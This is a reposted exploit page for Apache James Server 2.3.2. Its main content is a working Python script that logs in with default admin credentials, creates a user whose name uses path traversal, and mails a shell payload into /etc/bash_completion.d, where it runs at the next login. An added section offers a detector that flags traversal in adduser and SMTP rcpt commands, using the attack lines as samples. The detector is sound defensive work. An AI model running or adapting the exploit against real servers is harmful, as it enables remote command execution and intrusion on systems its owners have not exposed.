Apache James Server 2.3.2 - Remote Command Execution
Published: 2019-05-10


```python
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
    s.recv(1024)
    time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."
```
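A detection-side companion, added here as an example and not part of the original exploit or of Apache James: it flags the two requests the script depends on, an admin `adduser` command and an SMTP `rcpt to`, when the user name contains path-traversal characters. It assumes one captured command per line (for instance from a capture of ports 4555 and 25); the function names and the sample lines are constructed for illustration.

```python
import re

# Commands as seen on the wire: admin console (port 4555) and SMTP (port 25).
ADDUSER_RE = re.compile(r"^\s*adduser\s+(\S+)", re.IGNORECASE)
RCPT_RE = re.compile(r"^\s*rcpt\s+to:\s*<?([^>\s]*)>?", re.IGNORECASE)


def is_unsafe_mailbox_name(name):
    """True if a user name / local part could escape the per-user mail directory."""
    local = name.rsplit("@", 1)[0]  # ignore any @domain suffix
    # Path separators, NUL, or consecutive dots have no place in a mailbox name
    # (consecutive dots are also invalid in an unquoted SMTP local part).
    return local == "." or ".." in local or any(c in local for c in "/\\\x00")


def scan_commands(lines):
    """Return (line_number, kind, value) for every suspicious command."""
    findings = []
    for n, line in enumerate(lines, 1):
        for kind, rx in (("admin adduser", ADDUSER_RE), ("smtp rcpt", RCPT_RE)):
            m = rx.match(line)
            if m and is_unsafe_mailbox_name(m.group(1)):
                findings.append((n, kind, m.group(1)))
    return findings


# Constructed sample input: benign commands mixed with the ones the script sends.
SAMPLE = [
    "adduser alice s3cret",
    "adduser ../../../../../../../../etc/bash_completion.d exploit",
    "RCPT TO:<bob@example.org>",
    "rcpt to: <../../../../../../../../etc/bash_completion.d>",
    "rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>",
    "mail from: <'@team.pl>",
]

if __name__ == "__main__":
    for n, kind, value in scan_commands(SAMPLE):
        print("line %d: %s with traversal in user name: %r" % (n, kind, value))
```

The same `is_unsafe_mailbox_name` check can serve as an input filter in front of any tool that creates mail users, so that a name is rejected before it is ever used as a directory name.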

Reposted from: http://yommb.baihongyu.com/
